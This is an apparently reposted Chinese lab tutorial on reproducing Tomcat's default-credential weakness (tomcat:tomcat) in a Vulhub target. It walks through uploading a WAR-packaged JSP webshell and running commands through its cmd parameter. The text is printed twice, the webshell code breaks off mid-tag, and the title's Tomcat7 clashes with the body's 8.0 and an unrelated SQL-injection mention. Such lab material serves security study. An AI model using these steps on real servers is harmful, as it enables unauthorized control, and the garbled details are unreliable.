Vulhub的Tomcat7靶机中,如何复现弱口令漏洞?
- 内容介绍
- 文章标签
- 相关推荐
本文共计560个文字,预计阅读时间需要3分钟。
免责声明:本文仅供学习研究之用,严禁用于非法活动。任何后果由使用者本人负责。
背景知识:Tomcat中间件、WAR文件、木马
漏洞介绍:影响范围:Tomcat 8.0版本漏洞类型:弱口令、SQL注入
漏洞类型说明:
1.弱口令:攻击者通过猜测或使用自动化工具尝试破解Tomcat管理后台的登录密码,一旦成功,攻击者可以获取服务器控制权。
2.SQL注入:攻击者在Tomcat的请求参数中插入恶意SQL代码,执行非法操作,如数据篡改、数据库泄露等。
0x00 背景知识免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
- tomcat中间件
- war文件
- 木马
- 影响范围:Tomcat 8.0版本
- 漏洞类型:弱口令
- 漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问。
Vulhub靶场
漏洞利用- 访问靶机的tomcat管理页面
your-ip:8080/manager/html,输入弱密码tomcat:tomcat,访问后台并找到war文件上传位置。
- 准备木马文件ma.jsp,使用命令
jar -cvf ma.war ma.jsp,将jsp文件打包为war文件。
点击查看木马内容
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta 192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=ls,可以看到命令执行成功。
cmd参数执行命令了。参考链接
- Tomcat漏洞复现CVE-2017-12615&CVE-2020-1938&弱口令
- Tomcat控制台弱密码漏洞
本文共计560个文字,预计阅读时间需要3分钟。
免责声明:本文仅供学习研究之用,严禁用于非法活动。任何后果由使用者本人负责。
背景知识:Tomcat中间件、WAR文件、木马
漏洞介绍:影响范围:Tomcat 8.0版本漏洞类型:弱口令、SQL注入
漏洞类型说明:
1.弱口令:攻击者通过猜测或使用自动化工具尝试破解Tomcat管理后台的登录密码,一旦成功,攻击者可以获取服务器控制权。
2.SQL注入:攻击者在Tomcat的请求参数中插入恶意SQL代码,执行非法操作,如数据篡改、数据库泄露等。
0x00 背景知识免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
- tomcat中间件
- war文件
- 木马
- 影响范围:Tomcat 8.0版本
- 漏洞类型:弱口令
- 漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问。
Vulhub靶场
漏洞利用- 访问靶机的tomcat管理页面
your-ip:8080/manager/html,输入弱密码tomcat:tomcat,访问后台并找到war文件上传位置。
- 准备木马文件ma.jsp,使用命令
jar -cvf ma.war ma.jsp,将jsp文件打包为war文件。
点击查看木马内容
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta 192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=ls,可以看到命令执行成功。
cmd参数执行命令了。参考链接
- Tomcat漏洞复现CVE-2017-12615&CVE-2020-1938&弱口令
- Tomcat控制台弱密码漏洞

